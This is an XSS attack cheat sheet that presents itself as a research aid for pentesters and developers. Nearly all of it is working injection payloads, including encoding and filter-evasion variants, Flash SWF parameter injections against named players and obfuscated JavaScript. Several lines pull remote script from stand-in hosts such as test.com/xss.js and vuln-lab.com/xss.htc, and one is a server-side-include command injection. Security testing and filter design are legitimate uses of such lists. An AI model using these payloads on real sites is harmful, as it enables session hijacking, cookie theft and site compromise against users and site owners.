1Title: Ultimate Cross Site Scripting Attack Cheat Sheet
2Last Update: 2018-06-28
3
4Note: This is a technical sheet for research about cross-site scripting (XSS) attacks.
5Please extend this ultimate XSS cheat sheet list or contribute updates.
6This cheat sheet list is intended to assist pentesters, developers, researchers & whitehats.
7
8
9
10
11Event handler attributes that can trigger XSS:
12onclick
13ondblclick
14onmousedown
15onmousemove
16onmouseover
17onmouseout
18onmouseup
19onkeydown
20onkeypress
21onkeyup
22onabort
23onerror
24onload
25onresize
26onscroll
27onunload
28onsubmit
29onblur
30onchange
31onfocus
32onreset
33onselect
34onMoveOn
35
36
37Brackets for Tags
38>"
39">
40<"
41><
42>"<
43.\>"</.
44./>%20<./
45/>%20<
46%20/%20>
47%20">%20<
48%3E%3C
49Pjw=
50
51
52XSS Strings:
53<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
54<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
55<SCRIPT>document.cookie=true;</SCRIPT>
56<IMG SRC="jav ascript:document.cookie=true;">
57<IMG SRC="javascript:document.cookie=true;">
58<IMG SRC="  javascript:document.cookie=true;">
59<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
60<SCRIPT>document.cookie=true;//<</SCRIPT>
61<SCRIPT <B>document.cookie=true;</SCRIPT>
62<IMG SRC="javascript:document.cookie=true;">
63<iframe src="javascript:document.cookie=true;>
64<SCRIPT>a=/XSS/\ndocument.cookie=true;</SCRIPT>
65</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
66<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
67<BODY BACKGROUND="javascript:document.cookie=true;">
68<BODY ONLOAD=document.cookie=true;>
69<IMG DYNSRC="javascript:document.cookie=true;">
70<IMG LOWSRC="javascript:document.cookie=true;">
71<BGSOUND SRC="javascript:document.cookie=true;">
72<BR SIZE="&{document.cookie=true}">
73<LAYER SRC="javascript:document.cookie=true;"></LAYER>
74<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
75<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>XSS
76ºscriptædocument.cookie=true;º/scriptæ
77<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
78<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
79<TABLE BACKGROUND="javascript:document.cookie=true;">
80<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
81<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
82<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
83<DIV STYLE="width: expression(document.cookie=true);">
84<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
85<IMG STYLE="xss:expr/*XSS*/ession(document.cookie=true)">
86<XSS STYLE="xss:expression(document.cookie=true)">
87exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.cookie=true)'>
88<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
89<STYLE>.XSS{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=XSS></A>
90<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
91<SCRIPT>document.cookie=true;</SCRIPT>
92<BASE HREF="javascript:document.cookie=true;//">
93<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
94<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
95<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
96<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
97<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
98<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
99<a href="javascript#document.cookie=true;">
100<div onmouseover="document.cookie=true;">
101<img src="javascript:document.cookie=true;">
102<img dynsrc="javascript:document.cookie=true;">
103<input type="image" dynsrc="javascript:document.cookie=true;">
104<bgsound src="javascript:document.cookie=true;">
105&<script>document.cookie=true;</script>
106&{document.cookie=true;};
107<img src=&{document.cookie=true;};>
108<link rel="stylesheet" href="javascript:document.cookie=true;">
109<img src="mocha:document.cookie=true;">@mario_payload
110<img src="livescript:document.cookie=true;">
111<a href="about:<script>document.cookie=true;</script>">
112<body onload="document.cookie=true;">
113<div style="background-image: url(javascript:document.cookie=true;);">
114<div style="behaviour: url([link to code]);">
115<div style="binding: url([link to code]);">
116<div style="width: expression(document.cookie=true;);">
117<style type="text/javascript">document.cookie=true;</style>
118<object classid="clsid:..." codebase="javascript:document.cookie=true;">
119<style><!--</style><script>document.cookie=true;//--></script>
120<<script>document.cookie=true;</script>
121<script>document.cookie=true;//--></script>
122<!-- -- --><script>document.cookie=true;</script><!-- -- -->
123<img src="blah"onmouseover="document.cookie=true;">
124<img src="blah>" onmouseover="document.cookie=true;">
125<xml src="javascript:document.cookie=true;">
126<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
127<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
128
129
130Restriction Bypass:
131>"<iframe src=http://global-evolution.info/>@gmail.com
132>"<script>alert(document.cookie)</script><div style="1@gmail.com
133>"<script>alert(document.cookie)</script>@gmail.com
134
135
136<html><body>
137<button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
138101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
13910,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
140om.Char.Code</button></body></html>
141
142%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
143%73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
144%73%63%72%69%70%74%3E
145
146Obfuscated Bypass:
147>ì<ScriPt>ALeRt("xssOBFSbypass")</scriPt>
148
149
150
151XSS strings prefixed with a closing quote and tag to break out of the surrounding attribute/tag:
152>"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
153>"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
154>"<SCRIPT>document.cookie=true;</SCRIPT>
155>"<IMG SRC="jav ascript:document.cookie=true;">
156>"<IMG SRC="javascript:document.cookie=true;">
157>"<IMG SRC="  javascript:document.cookie=true;">
158>"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
159>"<SCRIPT>document.cookie=true;//<</SCRIPT>
160>"<SCRIPT <B>document.cookie=true;</SCRIPT>
161>"<IMG SRC="javascript:document.cookie=true;">
162>"<iframe src="javascript:document.cookie=true;>
163>"<SCRIPT>a=/XSS/\ndocument.cookie=true;</SCRIPT>
164>"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
165>"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
166>"<BODY BACKGROUND="javascript:document.cookie=true;">
167>"<BODY ONLOAD=document.cookie=true;>
168>"<IMG DYNSRC="javascript:document.cookie=true;">
169>"<IMG LOWSRC="javascript:document.cookie=true;">
170>"<BGSOUND SRC="javascript:document.cookie=true;">
171>"<BR SIZE="&{document.cookie=true}">
172>"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
173>"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
174>"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>XSS
175>"ºscriptædocument.cookie=true;º/scriptæ
176>"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
177>"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
178>"<TABLE BACKGROUND="javascript:document.cookie=true;">
179>"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
180>"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
181>"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
182>"<DIV STYLE="width: expression(document.cookie=true);">
183>"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
184>"<IMG STYLE="xss:expr/*XSS*/ession(document.cookie=true)">
185>"<XSS STYLE="xss:expression(document.cookie=true)">
186>"exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.cookie=true)'>
187>"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
188>"<STYLE>.XSS{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=XSS></A>
189>"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
190>"<SCRIPT>document.cookie=true;</SCRIPT>
191>"<BASE HREF="javascript:document.cookie=true;//">
192>"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
193>"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
194>"<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
195>"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
196>"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
197>"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
198>"<a href="javascript#document.cookie=true;">
199>"<div onmouseover="document.cookie=true;">
200>"<img src="javascript:document.cookie=true;">
201>"<img dynsrc="javascript:document.cookie=true;">
202>"<input type="image" dynsrc="javascript:document.cookie=true;">
203>"<bgsound src="javascript:document.cookie=true;">
204>"&<script>document.cookie=true;</script>
205>"&{document.cookie=true;};
206>"<img src=&{document.cookie=true;};>
207>"<link rel="stylesheet" href="javascript:document.cookie=true;">
208>"<img src="mocha:document.cookie=true;">
209>"<img src="livescript:document.cookie=true;">
210>"<a href="about:<script>document.cookie=true;</script>">
211>"<body onload="document.cookie=true;">
212>"<div style="background-image: url(javascript:document.cookie=true;);">
213>"<div style="behaviour: url([link to code]);">
214>"<div style="binding: url([link to code]);">
215>"<div style="width: expression(document.cookie=true;);">
216>"<style type="text/javascript">document.cookie=true;</style>
217>"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
218>"<style><!--</style><script>document.cookie=true;//--></script>
219>"<<script>document.cookie=true;</script>
220>"<script>document.cookie=true;//--></script>
221>"<!-- -- --><script>document.cookie=true;</script><!-- -- -->
222>"<img src="blah"onmouseover="document.cookie=true;">
223>"<img src="blah>" onmouseover="document.cookie=true;">
224>"<xml src="javascript:document.cookie=true;">
225>"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
226>"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
227
228
229
230Others: Random
231';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
232'';!--"<XSS>=&{()}
233<SCRIPT SRC=http://test.com/xss.js></SCRIPT>
234<IMG SRC="javascript:alert('XSS');">
235<IMG SRC=javascript:alert('XSS')>
236<IMG SRC=JaVaScRiPt:alert('XSS')>
237<IMG SRC=javascript:alert("XSS")>
238<IMG SRC=`javascript:alert("RM'XSS'")`>
239<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
240<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
241<IMG SRC="jav ascript:alert('XSS');">
242<IMG SRC="jav	ascript:alert('XSS');">
243<IMG SRC="jav
ascript:alert('XSS');">
244<IMG SRC="jav
ascript:alert('XSS');">
245<IMG
246SRC
247=
248"
249j
250a
251v
252a
253s
254c
255r
256i
257p
258t
259:
260a
261l
262e
263r
264t
265(
266'
267X
268S
269S
270'
271)
272"
273>
274perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
275perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
276<IMG SRC="  javascript:alert('XSS');">
277<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
278<<SCRIPT>alert("XSS");//<</SCRIPT>
279<SCRIPT SRC=http://test.com/xss.js?<B>
280<SCRIPT SRC=//test.com/.j>
281<IMG SRC="javascript:alert('XSS')"
282<iframe src=http://test.com/index.html <
283<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
284\";alert('XSS');//
285</TITLE><SCRIPT>alert("XSS");</SCRIPT>
286<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
287<BODY BACKGROUND="javascript:alert('XSS')">
288<BODY ONLOAD=alert('XSS')>
289<IMG DYNSRC="javascript:alert('XSS')">
290<IMG LOWSRC="javascript:alert('XSS')">
291<BGSOUND SRC="javascript:alert('XSS');">
292<BR SIZE="&{alert('XSS')}">
293<LAYER SRC="http://test/script.html"></LAYER>
294<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
295<LINK REL="stylesheet" HREF="http://test.com/xss.css">
296<STYLE>@import'http://test.com/xss.css';</STYLE>
297<META HTTP-EQUIV="Link" Content="<http://test.com/xss.css>; REL=stylesheet">
298<STYLE>BODY{-moz-binding:url("http://test.com/xssmoz.xml#xss")}</STYLE>
299<XSS STYLE="behavior: url(xss.htc);">
300<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
301<IMG SRC='vbscript:msgbox("XSS")'>
302<IMG SRC="mocha:[code]">
303<IMG SRC="livescript:[code]">
304ºscriptæalert(¢XSS¢)º/scriptæ
305<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
306<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
307<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
308<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
309<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
310<TABLE BACKGROUND="javascript:alert('XSS')">
311<TABLE><TD BACKGROUND="javascript:alert('XSS')">
312<DIV STYLE="background-image: url(javascript:alert('XSS'))">
313<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
314<DIV STYLE="background-image: url(javascript:alert('XSS'))">
315<DIV STYLE="width: expression(alert('XSS'));">
316<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
317<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
318<XSS STYLE="xss:expression(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
319<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
320<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
321<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
322<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->
323<BASE HREF="javascript:alert('XSS');//">
324<OBJECT TYPE="text/x-scriptlet" DATA="http://test.com/scriptlet.html"></OBJECT>
325<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
326<EMBED SRC="http://test.com/xss.swf" AllowScriptAccess="always"></EMBED>
327
328<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
329
330<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
331
332
333<EMBED SRC="data:image/svg+xml;base64,JTIwPiI8PGlmcmFtZSBzcmM9aHR0cDovL3Z1bG4tbGFiLmNvbSBvbmxvYWQ9YWxlcnQoZG9jdW1lbnQuY29va2llKSA8" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
334
335
336Flash SWF XSS
337
338 ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
339
340 plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
341
342 plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)
343
344 FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
345
346 videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
347
348 YUI "io.swf": io.swf?yid=\"));}catch(e){alert(document.domain);}//
349
350 YUI "uploader.swf": uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
351
352 Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
353
354 AutoDemo: control.swf?onend=javascript:alert(1)//
355
356 Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
357
358 Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
359
360 JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)
361
362 SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//
363
364 Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
365
366 FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf
367
368
369
370a="get";
371b="URL(\"";
372c="javascript:";
373d="alert('XSS');\")";
374eval(a+b+c+d);
375
376
377XML Schema
378<HTML xmlns:xss>
379 <?import namespace="xss" implementation="http://vuln-lab.com/xss.htc">
380 <xss:xss>XSS</xss:xss>
381
382<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
383</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
384
385
386<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
387<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
388
389
390<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
391
392<HTML><BODY>
393<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
394<?import namespace="t" implementation="#default#time2">
395<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
396</BODY></HTML>
397
398
399<?xml version="1.0" ?>
400<someElement>
401<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
402</someElement>
403
404
405
406<SCRIPT SRC="http://test.com/xss.jpg"></SCRIPT>
407
408
409<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://test.com/xss.js></SCRIPT>'"-->
410
411<? echo('<SCR)';
412echo('IPT>alert("XSS")</SCRIPT>'); ?>
413
414<IMG SRC="http://www.test.com/file.php?variables=malicious">
415
416Redirect 302 /test.jpg http://test.com/admin.asp&deleteuser
417
418<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
419<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
420<SCRIPT a=">" SRC="http://test.com/xss.js"></SCRIPT>
421<SCRIPT a=`>` SRC="http://test.com/xss.js"></SCRIPT>
422<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://test.com/xss.js"></SCRIPT>
423<A HREF="http://server.com/">XSS</A>
424<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
425<A HREF="http://1113982867/">XSS</A>
426<A HREF="javascript:document.location='http://www.test.com/'">XSS</A>
427
428%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E
429
430<iframe src=http://test.de>
431
432<iframe src=http://test.de>
433
434PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
435
436
437<input/onmouseover="javaSCRIPT:confirm(1)"
438
439<sVg><scRipt >alert(1) {Opera}
440
441<img/src=`` onerror=this.onerror=confirm(1)
442
443<form><isindex formaction="javascript:confirm(1)"
444
445<img src=``
 onerror=alert(1)

446
447
448<sCrIpt>alert(1)</ScRipt>
449<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
450
451
452<img src='1' onerror\x00=alert(0) />
453
454<img src='1' onerror/=alert(0) />
455
456<img src='1' onerror\x0b=alert(0) />
457
458<img src='1' onerror=\x00alert(0) />
459
460<img src='1' o\x00nerr\x00or=alert(0) />
461
462<\x00img src='1' onerror=alert(0) />
463
464<script\x00>alert(1)</script>
465
466<i\x00mg src='1' onerror=alert(0) />
467
468<img/src='1'/onerror=alert(0)>
469
470<img\x0bsrc='1'\x0bonerror=alert(0)>
471
472<img src='1''onerror='alert(0)'>
473<img src='1'"onerror="alert(0)">
474
475<img src='1'\x00onerror=alert(0)>
476
477<img src='1'onerror=alert(0)>
478
479ì><img title="test-xss" onmouseup="confirm(document.domain)">
480
481
482Firefox (\x09, \x0a, \x0d, \x20)
483Chrome (Any character \x01 to \x20)
484<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->
485
486
487<img src='1' onerror='alert(0)' <
488
489Extra less-than characters (IE, Firefox, Chrome, Safari).
490<<script>alert(0)</script>
491
492<style>body{background-color:expression\(alert(1))}</style>
493
494
495<script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>
496
497
498<img src="1" onerror="alert(1)" />
499<img src="1" onerror="alert(1)" />
500<iframe src="javascript:alert(1)"></iframe>
501<iframe src="javascript:alert(1)"></iframe>
502
503
504<iframe src="javascript:alert(1)"></iframe>
505<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
506
507
508<div style="x:expression(alert(1))">Joker</div>
509<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
510<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
511<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>
512
513
514<script>document.write('<img src=1 onerror=alert(1)>');</script>
515<script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
516<script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
517<script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>
518
519<script>document.write('<img src=1 onerror=alert(1)>');</script>
520<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>
521
522
523<script>alert(123)</script>
524<script>\u0061\u006C\u0065\u0072\u0074(123)</script>
525
526
527< = %C0%BC = %E0%80%BC = %F0%80%80%BC
528> = %C0%BE = %E0%80%BE = %F0%80%80%BE
529' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
530" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
531
532<img src="1" onnerror="alert(1)">
533%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
534
535
536<img src="1" onerror="alert(1)" />
537+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
538
539
540<script>alert(1)</script>
541%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
542
543
544<img src="1" onerror="alert('1')">
545%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
546
547
548<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
549<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />
550
551
552<blah style="blah:expression(alert(1))" />
553
554
555<div style="z:exp/*anything*/res/*here*/sion(alert(1))" />
556
557
558<script>window['alert'](0)</script>
559<script>parent['alert'](1)</script>
560<script>self['alert'](2)</script>
561<script>top['alert'](3)</script>
562
563
564<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
565
566
567<script>
568var junk = '</script><script>alert(1)</script>';
569</script>
570
571
572<style>
573body { background-image:url('http://www.test.com/</style><script>alert(1)</script>'); }
574</style>
575
576
577<iframe src="javascript:alert(1)"></iframe>
578<iframe src="vbscript:msgbox(1)"></iframe> (IE)
579<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
580<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)
581
582
583http://test.com/something.xxx?a=val1&a=val2
584ASP.NET a = val1,val2
585ASP a = val1,val2
586JSP a = val1
587PHP a = val2
588
589
590<script>eval(location.hash.slice(1))</script>
591<script>eval(location.hash)</script> (Firefox)
592
593http://test.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)
594
595
596<iframe src="http://test.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>
597
598
599<script>
600$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
601</script>
602
603
604<script>
